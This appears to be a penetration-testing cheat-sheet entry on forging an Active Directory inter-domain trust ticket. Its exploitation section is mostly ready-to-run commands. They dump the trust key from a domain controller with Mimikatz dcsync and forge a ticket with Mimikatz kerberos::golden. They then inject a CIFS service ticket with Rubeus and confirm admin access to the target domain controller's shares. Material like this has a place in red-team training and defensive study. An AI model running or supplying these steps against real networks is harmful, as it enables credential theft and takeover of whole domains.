Forge Trust Ticket

The domain Kerberos service account is used to sign and encrypt every authentication ticket (TGT). This enables the TGT to be used throughout the domain and presented to any DC in the domain. This works since the Kerberos service account (KRBTGT) is effectively the trust anchor used for the domain and is why losing control of the KRBTGT account password hash equates to losing control of the domain.

Exploitation

1. The first step is to retrieve the trust key. This is achieved by dumping the domain controller with Mimikatz:

# Dumping the trust key with Mimikatz
lsadump::dcsync /user:$domain$

2. We can then create the trust ticket using Mimikatz as well:

kerberos::golden /domain:$domain /sid:$domainsid /rc4:$krbtgthash /user:Administrator /service:krbtgt /target:$targetdomain /ticket:trust.kirbi

3. After saving the ticket to a file we can use the created ticket to request a TGS for the targeted service, which in this case is going to be CIFS in the target domain using Rubeus.exe:

.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/$targetdomain /ptt /dc:$targetdc

4. From using the /ptt argument with Rubeus, we have already injected the ticket into memory and should now be able to access the target domain controller. A trivial way to verify if this was successful is by listing the contents of the target domain controller:

# Confirm access with net use
net use \\$targetdc\admin$

# List the contents of the target domain controller
dir \\$targetdc\admin$
dir \\$targetdc\c$

References